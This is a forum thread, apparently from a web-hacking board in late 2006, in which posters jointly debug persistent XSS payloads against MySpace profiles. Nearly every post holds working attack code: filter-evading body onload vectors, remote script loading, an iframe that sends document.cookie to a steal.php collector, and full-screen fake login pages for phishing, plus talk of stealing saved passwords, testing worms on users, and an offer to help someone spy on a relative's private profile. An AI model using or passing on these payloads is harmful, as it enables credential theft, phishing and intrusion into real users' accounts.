In relation to the XSS flaw V-wall found in myspace, (5th DEC), I have been trying to implement the appendchild into this which maluc did one the XSS fragementation exploit a while ago.

The original exploit was


<body onload\_="alert('hello')">

I would like any advice on how to use the appendchild without an alert, or with an alert if not possible.

<body onload.._="alert('hello');x=document.createElement('script');x.src="http://ha.ckers.org/s.js";document.body.appendChild(x)">

I had that, but it doesnt work, so any (useful) replies would be great. Thankyou.

If you would like to reply abuse, just PM me rather than on here as i would like to actually know the answer rather than your opinion on my post.

Thanks in advance.

Maybe this helps:
http://www.java2s.com/Code/JavaScriptReference/Javascript-Methods/appendChildSyntaxParametersandNote.htm

Applied to:
http://www.java2s.com/Code/JavaScriptReference/Javascript-Methods/appendChildisappliedto.htm

You just had a very minor typo:

<body onload.._="alert('hello');x=document.createElement('script');x.src='http://ha.ckers.org/s.js';document.body.appendChild(x)">

You had too many double quotes in there and were prematurely ending your parameter. And btw, don't worry about getting flamed. This is not that kind of place. :) Hope that helps.

- RSnake
Gotta love it. http://ha.ckers.org

I think myspace blocks out the word script as a whole.
Might need to change it to...

<body onload.._="alert('hello');var scElem = 'scri'+'pt';x=document.createElement(scElem);x.src='http://ha.ckers.org/s.js';document.body.appendChild(x)">

- Kyran

This vector works: <body onloadæ="alert(document.cookie)"> as do a few others (discovered by randomly tapping ALT+Numpad) while I was messing around with Live HTTP Headers, I found out that different characters (%00 and %12 for example) don't work. I think æ works because it's displayed as æ but when you decode %C3 (what it really is) it shows as "Ã".


Actually, when you decode AboutMeText=%3Cbody+onload%C3%A6%3D%22alert%28document.cookie%29%22%3E (a snip of the packet), it shows it as two characters: "æ".

Kyran, yup, that makes sense.

Ghotz, that makes sense if they didn't know to look at any non-ascii-non-digit characters they would miss that one. Doesn't surprise me one bit.

- RSnake
Gotta love it. http://ha.ckers.org

Thanks for the help, each post was constructive... what a great forum. (pulls tongue out now) Although that was pretty bad of my to not notice single/double quotes being the error.

I was trying to test something out,

<body onload.._="alert('You must be logged in');x=document.createElement('script');x.src='http://eyeced.domain.com/test.js';document.body.appendChild(x)">

with the .js file containing

var title = "login.myspace.com";
window.location="http://eyeced.domain.com/login1.html"

as in your .js file the URL stays the same but your content is shown in the window, i was trying to use this to implement a fake login page, just as POC, so that the URL would say myspace.com and my page would be shown in the window. Just as in your "stallowned" example. Could this be done? Im guessing so as you managed to with the stallowned part.

Anyway, if not then ill just be greatful for the help already.

sort of.. (if i understand your question correctly)

You would do so by overwriting the page with:

phishPage = "http://eyeced.domain.com/login1.html"
document.body.innerHTML = '<iframe src="'+phishPage+'" height="100%" width="100%" border=0></iframe>';

That will still likely show a border though, may need to do by style="" instead. There are browser differences in iframes taking the whole page though and honestly, my preferred method is to just put the entire html of login1.html into the .js file like

document.body.innerHTML = '<form action="myspace.com/login.php"><input blah>' //you get the idea..

*By the way, if you get an error alert in IE saying 'cannot load page blahblah' change the createElement('script') to createElement('script defer')

-maluc

He probably won't be getting many errors in IE since IE doesn't respect non-alpha-non-digit between the event handler and the equals sign. ;) But yes, that's a good trick when the exploit does work in IE.

@eyeced

Why do you want to create a fake login page if you just can steal there cookie silently? I think I just would do it like this:

<body onload.._="x=document.createElement('iframe');x.setAttribute('src','http://site.com/steal.php?cook=+document.cookie');
x.style.width='0px';x.style.height='0px';document.body.appendChild(x);">

in the steal.php you write the cookie away, and then try to login in quickly and try to change the cookie before that dude is trying re-login.

anyway, i ain't on myspace.

lol, touche rsnake.. i clearly wasn't paying attention.

i've just become a "script defer" evangelist, thanks to how long that error pissed me off one day

and jungsonn: plaintext passwords are always ideal over cookie credentials if they expire. probably best to do both, so you're atleast guaranteed temporary access. i would definitely add in a password manager stealing script though so you nail them whether or not they fall for the fake login.

-maluc

@ jungsonn

I don't want to steal cookies, i coded a cookie stealer for the quicktime exploit a few backs back. Its not the fact that i want to be able to steal accounts or i would just use a cookie stealer, i just want to be able to know i can rather than actually use it for the purpose of stealing the accounts. Im just trying different ways thats all, i no the cookie method works but i'd like to widen my scope...

@ Maluc & RSnake
Thanks for help!

Oh yeah, by the way guys, the way you mentioned of getting the child window inside the profile window works fine for your /s.js file, but when i try creating one with

phishPage = "http://eyeced.domain.com/login1.html"
document.body.innerHTML = '<iframe src="'+phishPage+'" height="100%" width="100%" border=0></iframe>';

the myspace.com url then changes to http://eyeced.domain.com and then becomes the entire page rather than a child window inside the original...

try "+=" .. as in document.body.innerHTML += 'blah'

= replaces the entire <body></body> contents with that.. += just appends

-maluc

If i use the vector

<body onload..Ø="x=document.createElement('if'+'rame');x.setAttribute('src','http://eyeced.domain.com/login.html');
x.style.width='100%';x.style.height='100%';document.body.appendChild(x);">

then it doesnt append it, it simply changes the url completely. Whereas if use += in the .js file then it works as appending it but i still get the border... dammmit!

it works fine for me.. except that you're gunna have to break up the .html so:

<body onload..Ø="x=document.createElement('if'+'rame');x.setAttribute('src','http://eyeced.domain.com/login.ht'+'ml');
x.style.width='100%';x.style.height='100%';document.body.appendChild(x);">

that gets appended just fine. if you just tried to copy paste their login page .. why dont you check the source and remove any:

<script>
if(top.location != window.location) top.location = window.location;
</script>

i'm betting that's where your problem lies. this definitely works, and borderless:

<body onload..Ø="x=document.createElement('if'+'rame');x.src='http://google.com/';
x.style.width='100%';x.style.height='100%';x.style.border=0;document.body.appendChild(x);">

-maluc

i was wondering if there was a code to view private myspace pages and how do you go about doing it? i am new to this and need to get in to my sisterinlaws page because my brother in the the military and we think shes cheating on him and my 10 month old nephew may be being left alone if anyone could help me with this i would greatly appericate it

.-. everyone has a sob story.. but email me -

arserbin3 is the addy
yahoo.fr is the host

-maluc

I never been at myspace.com, but it seems if I read all the XSS on here, it would be a fun place.

Is it getting harder on myspace? or just a cat and mouse game?

no actually, it's not easy to find these holes.. myspace does a guud job of preventing XSS. They are in a much tougher than normal situation though, by choosing to allow their users to input HTML code.

If i had to list every major dynamic website that has adequate XSS protection, it'd be a list of only 4. Google, Microsoft, Facebook, and Myspace. Now that's kinda sad when you think how many major sites don't make that cut (maybe i'm too picky .-.)

Although nobody's perfect - all four of those have had working XSS holes in the past week. Anyway, the fact that myspace allows a lot more opportunities for persistent XSS, makes it desirable to field test javascript worms. (not to mention the largest victim base)

-maluc

Yeah thanks, should have looked through it abit more really. Guess i was just concerned at changing the form values the first time i skimmed through the code. This works and borderless but it gets appended to the bottom of the page, so to see it i have to scroll down... this doesn't seem a convincing way. Im using FF 1.5.0.8, ill have a look through anyway, iv been very busy lately not really had chance to.

Also i was very shocked to see that they filter the word Iframe and convert it to [iframe], which can be solved simply by putting if'+'rame are they serious? This is pretty bad.



Edited 1 time(s). Last edit at 12/17/2006 01:45PM by eyeced.

To get borderless and scrolless windows, the following code will do it:

Page = "http://domain/page-to-display.html"
document.body.innerHTML = '<iframe src="'+Page+'"border=0 width="100%" height="100%" FRAMEBORDER=0></iframe>';


Took me a while to do as I was trying out quite a few different ways, then I just took a look at the official IFRAME args & voila, no frames

-.- just add a style="position:absolute" to the iframe

and their goal is to stop a direct <iframe> tag .. once you've already got javascript running it's just far too versatile to prevent other obfuscating. They do already filter "eval(" which is good.. and if they filtered "createElement(" and "appendChild(" too .. it would solve alot of their problems.. i think :x

-maluc

to save yourself extra questions.. here's a copy-pasteable version. switched to asdf since it has an easy to discern black background:

<body onload..Ø="x=document.createElement('if'+'rame');x.src='http://asdf.com/';y=x.style;
y.position='absolute';y.top='0';y.left='0';y.border='0';y.height=document.height;y.width=document.width;document.body.appendChild(x);">

-maluc

One tip about Myspace, use their built-in decode64 function and just use a settimeout on your code, and encode it in base64.

great tip ^^.. i was adding that same encoding to a PoC of mine but the fact that they have one built-in makes it much easier for the polymorphing side of the code

-maluc

Didn't Tom post a blog or something about updating Quicktime when it tells you?
I was just messing around with <embed src="http://neo-force.com/XSS.wav"></embed>
(Taken from http://www.criticalsecurity.net/index.php?showtopic=17562&hl=myspace)

And it turns it into:
<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://neo-force.com/XSS.wav" ></embed>

But it still works in IE and Firefox with no update message. I guess I'll update Quicktime and see what happens.

[Edit]
I upgraded to 7.1.3 from http://www.apple.com/quicktime/download/win.html and it still works fine in IE and Firefox.



Edited 2 time(s). Last edit at 12/19/2006 02:16AM by Ghozt.

Hi all,
the following blog entry of mine could be interesting for some of you. I think this method will work at many different places but I didn't try it yet.

You'll find the blog entry here:
http://www.disenchant.ch/blog/32/32

Regards,
Disenchant

--

http://www.disenchant.ch/

yes, the mozbinding has been discussed frequently here, and it's quite useful. You should note that it works for firefox only, though.

And that's a good find, they filter it out in the profile page but not for blogs.. guess we should retry all the previous holes on the blogs too - since they go through less filtering.

other places it work(s|ed): http://sla.ckers.org/forum/search.php?3,search=binding,page=1,match_type=ALL,match_dates=365,match_forum=ALL

-maluc

in myspaces profile, the following event handlers are not filtered (taken from the XSS cheat sheet):

1.	FSCommand() (attacker can use this when executed from within an embedded Flash object)
14.	onBegin() (the onbegin event fires immediately when the element's timeline begins)
23.	onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
24.	onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
25.	onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.	onDataSetComplete() (fires to indicate that all data is available from the data source object)
29.	onDrag() (requires that the user drags an object)
36.	onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
39.	onExit() (someone clicks on a link or presses the back button)
52.	onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
53.	onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)

see what you can come up with that executes..

-maluc



Edited 2 time(s). Last edit at 12/23/2006 03:56PM by maluc.